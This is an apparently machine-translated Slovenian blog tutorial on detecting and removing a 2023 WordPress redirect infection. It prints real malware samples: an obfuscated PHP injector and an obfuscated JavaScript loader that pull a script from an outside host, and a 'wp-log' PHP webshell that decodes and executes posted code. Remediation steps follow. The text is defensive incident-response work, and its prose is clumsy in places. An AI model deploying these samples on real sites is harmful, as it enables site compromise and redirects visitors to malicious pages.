Popravite preusmeritev WordPress Hack 2023 (preusmeritev virusa)

WordPress je vsekakor najbolj uporabljena platforma CMS (Content Management System) Tako za bloge kot za spletne trgovine za starter (z modulom WooCommerce), zaradi česar je najbolj usmerjen z računalniškimi napadi (kramp). Ena izmed najbolj uporabljenih operacij hekerjev želi preusmeriti ogroženo spletno mesto na druge spletne strani. Redirect WordPress Hack 2023 je relativno nova zlonamerna programska oprema, ki vpliva na preusmeritev celotnega spletnega mesta na neželene spletne strani ali ki lahko virusira uporabniške računalnike.

zadovoljstvo

Če je vaše spletno mesto, razvito na WordPresu, preusmerjeno na drugo spletno mesto, potem je žrtev že znamenita kramp za preusmeritev.

V tej vadnici boste našli potrebne informacije in koristne nasvete, s katerimi lahko zavrnete spletno mesto, okuženo s preusmeritvijo WordPress Hack (Virus Redirect). Skozi komentarje lahko dobite dodatne informacije ali prosite za pomoč.

Zaznavanje virusa, ki preusmeri mesta WordPress

Nenadno in neupravičeno zmanjšanje prometa na spletnem mestu, zmanjšanje števila naročil (v primeru spletnih trgovin) ali oglaševalski prejemki so prvi znaki, da nekaj ni v redu. Odkrivanje “Redirect WordPress Hack 2023” (Preusmeritev virusa) je mogoče narediti in “vidno” Ko odprete spletno mesto in ste preusmerjeni na drugo spletno stran.

Iz izkušenj je večina aplikacij za zlonamerno programsko opremo združljiva z internetnimi brskalniki: Chrome, Firefox, Edge, Opera. Če ste uporabnik računalnika Mac, ti virusi v brskalniku Safari niso zelo vidni. Safari varnostni sistem tiho blokira te zlonamerne skripte.

Kaj morate storiti, če imate spletno mesto virusa virusa kramp WordPress

Upam, da prvi ukrep ni paničen ali izbrisati spletnega mesta. V prvi fazi ni treba izbrisati niti virusnih ali virusnih datotek. Vsebujejo dragocene informacije, ki vam lahko pomagajo razumeti, kje je kršitev varnosti in kaj je vplival virus. Modus operandi.

Zaprite spletno mesto za javnost.

Kako zaprete spletno mesto za virus za obiskovalce? Najpreprostejši je, da uporabite upravitelja DNS in izbrišete svoj IP za “A” (ime domene) ali določite neobstoječi IP. Tako bodo obiskovalci spletnega mesta zaščiteni pred tem preusmeritvijo WordPress Hack, ki jih lahko prevzame na spletnih straneh virusa ali neželene pošte.

Če uporabljate CloudFlare Kot upravitelj DNS pristno overite v svojem računu in izbrišete zapise DNS “A” za ime domene. Tako bo območje, na katerega vpliva virus, ostalo brez IP -ja, ne bo mogel dostopati do interneta.

Kopirajte IP spletnega mesta in naredite “pot” da lahko dostopate do samo vas. Iz računalnika.

Kako spremenite resnični IP spletnega mesta v računalnikih Windows?

Metoda se pogosto uporablja za blokiranje dostopa do nekaterih spletnih mest z urejanjem datoteke “gostitelji”.

1. Odprite beležko ali drug urejevalnik besedil (s skrbniškimi pravicami) in uredite datoteko “hosts“. Nahaja se v:

C:\Windows\System32\drivers\etc\hosts

2. v datoteki “gostitelji” dodaj “pot” na resnični IP vašega spletnega mesta. IP, izbrisan zgoraj pri DNS Managerju.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Shranite datoteko in dostop do spletnega mesta v brskalniku.

Če se spletno mesto ne odpre in v datoteki niste storili napake “gostitelji”, najverjetneje je predpomnilnik DNS.

Če želite izbrisati predpomnilnik DNS v operacijskem sistemu Windows, odprite ukazni poziv, kjer izvršite naročilo:

ipconfig /flushdns

Kako spremenite resnični IP spletnega mesta v računalnikih Mac / MacBook?

Za uporabnike računalnikov Mac je malo lažje spremeniti resnični IP spletnega mesta.

1. odprite pripomoček Terminal.

2. Izvedite ukazno vrstico (za izvedbo zahteva sistemsko geslo):

sudo nano /etc/hosts

3. Kar zadeva računalnike Windows, dodajte resnični IP domene.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Shranite spremembe. Ctrl+X (y).

Ko ste to storili “pot”, Ste edina oseba, ki lahko dostopa do spletnega mesta virusa virusa Hack Word Word.

Celotno varnostno kopijo – Datoteke in baza podatkov

Tudi če je virus z “Preusmerite WordPress Hack”, priporočilo je, da ustvarite splošno varnostno kopijo celotnega spletnega mesta. Datoteke in baza podatkov. Mogoče bi lahko shranili lokalno kopijo obeh datotek v public / public_html kot tudi baza podatkov.

Identifikacija virusa in spremenjenih datotek preusmeritve WordPress Hack 2023

Glavne ciljne datoteke WordPress Jaz sem index.php (v korenu), header.php, index.php in footer.php WordPress Active Theme. Ročno preverite te datoteke in določite zlobno kodo ali skript zlonamerne programske opreme.

Leta 2023 virus tipa “Preusmerite WordPress Hack” daj noter index.php Koda obrazca:

(Ne priporočam, da te kode izvajate!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekodirano, to zlonamerna programska oprema Je praktično posledica spletnega mesta WordPress. Skript ni osnova aplikacije za zlonamerno programsko opremo, ampak je skript, ki omogoča preusmeritev spletne strani virusa. Če dekodiramo skript zgoraj, dobimo:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Popravite preusmeritev WordPress Hack 2023

Če kažejo vse datoteke na strežniku, ki vsebuje to kodo, je dobro imeti dostop SSH strežniku za zagon datotek za preverjanje in upravljanje v Linuxu.

Sorazmerno: Kako ugotovite, ali imate s pomočjo Googlovega iskanja ali ne virusnega bloga ali ne. (WordPress virus)

Spodaj sta dva ukaza, ki sta zagotovo koristna za prepoznavanje nedavno spremenjenih datotek in datotek, ki vsebujejo določeno kodo (String).

Kako vidite datoteke PHP, spremenjene v zadnjih 24 urah ali v drugem časovnem območju na Linuxu?

Ukaz “find” Uporaba je zelo preprosta in omogoča personalizacijo, da nastavi časovno obdobje, popravek, v katerem sta opravljena iskanje in vrsta datotek.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

V izhodu boste prejeli informacije o datumu in času, ko je bila datoteka spremenjena, dovoljuje pisanje / branje / izvedbo (chmod) in katerih skupina / uporabnik pripada.

Če želite preveriti pred nekaj dnevi, spremenite vrednost “-mtime -1” ali uporaba “-mmin -360” za nekaj minut (6 ur).

Kako iščete kodo (niz) znotraj datotek PHP, Java?

Ukazna vrstica “najti” S pomočjo katerega lahko hitro najdete vse datoteke PHP ali Java, ki vsebujejo določeno kodo, je naslednje:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Naročilo bo iskalo in prikazalo datoteke .php in .js vsebuje “uJjBRODYsU“.

S pomočjo dveh zgornjih naročil boste zelo enostavno našli, katere datoteke so bile v zadnjem času spremenjene in vsebujejo kodo zlonamerne programske opreme.

Odstrani zlonamerno programsko opremo iz spremenjenih datotek, ne da bi pri tem ogrozila pravilno kodo. V mojem scenariju je bila koda zlonamerne programske opreme postavljena pred odprtjem <head>.

Ob izvedbi prvega reda “najti” Na strežniku je zelo mogoče odkriti nove datoteke, ki niso WordPress ali dajo tja. Datoteke, ki razglašajo virus preusmerjanja kramp WordPress.

V scenariju, ki ga je preučil jaz, so se na strežniku pojavile datoteke obrazcev “wp-log-nOXdgD.php“. To so datoteke “generacija” ki vsebujejo tudi kodo zlonamerne programske opreme, ki jo uporablja virus preusmeritve.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Namen datotek “wp-log-*” Širiti virus preusmeritve virusa in drugih spletnih mest, ki jih gostijo na strežniku. Je koda zlonamerne programske opreme “webshell” sestavljen iz enega Osnovni odsek (v katerih so določene nekatere šifrirane spremenljivke) in O Oddelek za izvedbo S katerim napadalec poskuša naložiti in izvesti kodo zlonamerne programske opreme v sistemu.

Če obstaja spremenljivka POST poklical ‘bh‘ in njeno šifrirano vrednost MD5 je enak “8f1f964a4b4d8d1ac3f0386693d28d03“, potem se zdi, da skript piše šifrirano vsebino base64 druge spremenljivke, imenovane ‘b3‘ v začasno datoteko in nato poskusite vključiti to začasno datoteko.

Če obstaja spremenljivka POST ali GET poklical ‘tick'Scenarij se bo odzval z vrednostjo MD5 vrvice “885“.

Če želite prepoznati vse datoteke na strežniku, ki vsebuje to kodo, izberite pogost niz, nato izvedite ukaz “find” (podobno kot zgoraj). Izbrišite vse datoteke, ki vsebujejo to kodo zlonamerne programske opreme.

Kršitev varnosti, ki jo upravlja preusmeritev WordPress Hack

Najverjetneje ta preusmeritveni virus doseže Izkoriščanje uporabnika WordPress ali z identifikacijo a ranljiv vtičnik ki omogoča dodajanje uporabnikov z skrbniškimi privilegiji.

Za večino spletnih mest je mogoče, ki so zgrajena na platformi WordPress Urejanje tem ali vtičnikado upravnega vmesnika (Dashboard). Tako lahko zlonamerna oseba doda datoteke tematike zlonamerne programske opreme, ki ustvari zgoraj predstavljene skripte.

Primer takšne zlonamerne programske opreme je ta:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificirano v glavi WordPress teme, takoj po odprtju etikete <head>.

Ta JavaScript je precej težko dešifrirati, vendar je očitno, da bo drugi spletni naslov najverjetneje prinesel druge skripte za ustvarjanje datotek “wp-log-*” o tem, o čemer sem govoril zgoraj.

Poiščite in izbrišite to kodo iz vseh datotek PHP prizadeti.

Kolikor sem lahko ugotovil, je bila ta koda ročno dodano z novim uporabnikom z administrativnimi privilegiji.

Torej, da preprečite dodajanje zlonamerne programske opreme na nadzorni plošči, je najbolje onemogočiti WordPress / vtičnike na nadzorni plošči.

Uredi datoteko wp-config.php in dodajte vrstice:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Ko spremenite to spremembo, noben uporabnik WordPress ne bo mogel urediti datotek na nadzorno ploščo.

Preverite uporabnike z vlogo skrbnika

Spodaj je poizvedba SQL, ki jo lahko uporabite za iskanje uporabnikov s skrbnikom na platformi WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Ta poizvedba bo vrnila vse uporabnike v tabeli wp_users ki je pripisal vlogo skrbnika. Poizvedba je narejena za tabelo wp_usermeta Za iskanje v Meta ‘wp_capabilities', Ki vsebuje informacije o vlogah uporabnikov.

Druga metoda je, da jih prepoznate iz: Dashboard → Users → All Users → Administrator. Prakticiram, da je uporabnika lahko skrito na plošči na armaturni plošči. Torej najboljši način za ogled uporabnikov “Skrbnik” WordPress je zgornji ukaz SQL.

V mojem primeru sem v bazi podatkov identificiral uporabnika z imenom “wp-import-user“. Precej sugestivno.

WP zlonamerna programska oprema Slab uporabnik

Od tu si lahko ogledate datum in čas, ko je bil ustvarjen uporabnik WordPress. Uporabnik uporabnika je tudi zelo pomemben, ker je iskal v dnevnikih strežnika. Tako lahko vidite vso dejavnost tega uporabnika.

Izbrišite uporabnike z vlogo skrbnika da potem ne veste Spremenite gesla vsem administrativnim uporabnikom. Urednik, avtor, skrbnik.

Spremenite geslo uporabnikov SQL v bazo podatkov prizadetega spletnega mesta.

Po teh korakih lahko spletno mesto znova zažene za vse uporabnike.

Upoštevajte pa, da je to, kar sem predstavil zgoraj, eden od tisoč pljuva, s katerim je spletno mesto s preusmeritvijo WordPress Hack leta 2023.

Če je vaše spletno mesto virus in potrebujete pomoč ali če imate kakršne koli pomisleke, je polje za komentar odprto.